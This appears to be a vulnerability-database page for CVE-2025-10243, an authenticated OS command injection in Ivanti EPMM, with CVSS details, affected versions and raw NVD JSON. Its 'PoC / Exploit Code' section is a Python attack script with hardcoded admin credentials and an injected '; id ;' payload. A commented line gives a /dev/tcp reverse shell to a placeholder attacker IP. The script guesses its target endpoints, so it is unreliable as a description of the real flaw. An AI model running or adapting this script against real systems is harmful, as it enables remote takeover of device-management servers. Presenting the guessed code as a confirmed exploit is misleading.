Security Vulnerability Report
中文
CVE-2025-10243 CVSS 7.2 HIGH

CVE-2025-10243

Published: 2025-10-14 15:16:01
Last Modified: 2025-10-15 18:08:01
Source: 3c1d8aa1-5a33-4ea4-8992-aadd6440af75

Description

OS command injection in the admin panel of Ivanti EPMM before version 12.6.0.2, 12.5.0.4, and 12.4.0.4 allows a remote authenticated attacker with admin privileges to achieve remote code execution.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* - VULNERABLE
Ivanti EPMM < 12.4.0.4
Ivanti EPMM 12.5.x < 12.5.0.4
Ivanti EPMM 12.6.x < 12.6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10243 - Ivanti EPMM OS Command Injection PoC # Vulnerability: OS command injection in admin panel # Affected: Ivanti EPMM < 12.6.0.2, < 12.5.0.4, < 12.4.0.4 # Auth required: Admin privileges import requests from requests.auth import HTTPBasicAuth import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET_URL = "https://target-epmm-host:8443" ADMIN_USER = "admin" ADMIN_PASS = "password123" # Step 1: Authenticate to the admin panel and obtain session cookie session = requests.Session() session.verify = False login_url = f"{TARGET_URL}/mifs/admin/login.jsp" login_data = { "username": ADMIN_USER, "password": ADMIN_PASS } response = session.post(login_url, data=login_data) print(f"[*] Login response status: {response.status_code}") # Step 2: Inject OS command via vulnerable admin panel endpoint # The vulnerable parameter is typically used in a backend shell command # Example payload: ; id ; or | whoami | injected_payload = "; id ;" # The exact endpoint may vary; commonly affected admin functionality # involves device management, configuration, or diagnostics vulnerable_endpoints = [ "/mifs/admin/command/exec", "/mifs/admin/diagnostics/run", "/mifs/admin/device/manage" ] for endpoint in vulnerable_endpoints: target = f"{TARGET_URL}{endpoint}" params = { "cmd": injected_payload, "host": "127.0.0.1" } try: resp = session.post(target, data=params, timeout=10) if "uid=" in resp.text or "root" in resp.text: print(f"[+] Command injection successful at {endpoint}!") print(resp.text[:500]) break except Exception as e: print(f"[-] Error at {endpoint}: {e}") # Step 3: Establish reverse shell for full RCE # reverse_shell = "; bash -i >& /dev/tcp/attacker_ip/4444 0>&1 ;" # Replace the injected_payload with the reverse shell payload above

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10243", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2025-10-14T15:16:01.280", "lastModified": "2025-10-15T18:08:01.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS command injection in the admin panel of Ivanti EPMM before version 12.6.0.2, 12.5.0.4, and 12.4.0.4 allows a remote authenticated attacker with admin privileges to achieve remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.4.0.4", "matchCriteriaId": "14CCB657-0965-4842-B6BD-B7B2890DFB0B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.5.0.0", "versionEndExcluding": "12.5.0.4", "matchCriteriaId": "395B1544-0C7B-4883-BA2D-772416DE26E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.6.0.0", "versionEndExcluding": "12.6.0.2", "matchCriteriaId": "A53B20A3-676C-4ED2-B6A7-EEB2B537666C"}]}]}], "references": [{"url": "https://forums.ivanti.com/s/article/Security-Advisory-Endpoint-Manager-Mobile-EPMM-10-2025-Multiple-CVEs?language=en_US", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "tags": ["Vendor Advisory"]}]}}